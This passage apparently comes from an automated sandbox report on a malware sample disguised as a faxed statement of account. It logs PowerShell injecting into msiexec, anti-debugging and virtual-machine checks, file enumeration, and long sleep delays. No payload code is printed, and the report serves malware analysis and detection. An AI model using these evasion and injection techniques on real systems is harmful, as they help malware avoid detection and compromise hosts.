            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_004047CB
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5989Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3677Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.9 %
            Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4348Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 736Thread sleep count: 3059 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 3059 delay: -5Jump to behavior
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24ED10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_24ED10F1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00418981 memset,GetSystemInfo,11_2_00418981
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe, 00000000.00000002.1691943265.00000000007C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
            Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000006.00000002.2896774357.00000000090A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2896774357.00000000090F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: msiexec.exe, 00000006.00000002.2896774357.00000000090F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWi
            Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeAPI call chain: ExitProcess graph end nodegraph_0-3491
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeAPI call chain: ExitProcess graph end nodegraph_0-3273
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24ED60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_24ED60E2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,11_2_004044A4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24ED4AB4 mov eax, dword ptr fs:[00000030h]6_2_24ED4AB4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24ED724E GetProcessHeap,6_2_24ED724E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24ED60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_24ED60E2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24ED2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_24ED2639
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24ED2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_24ED2B1C

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 44D0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
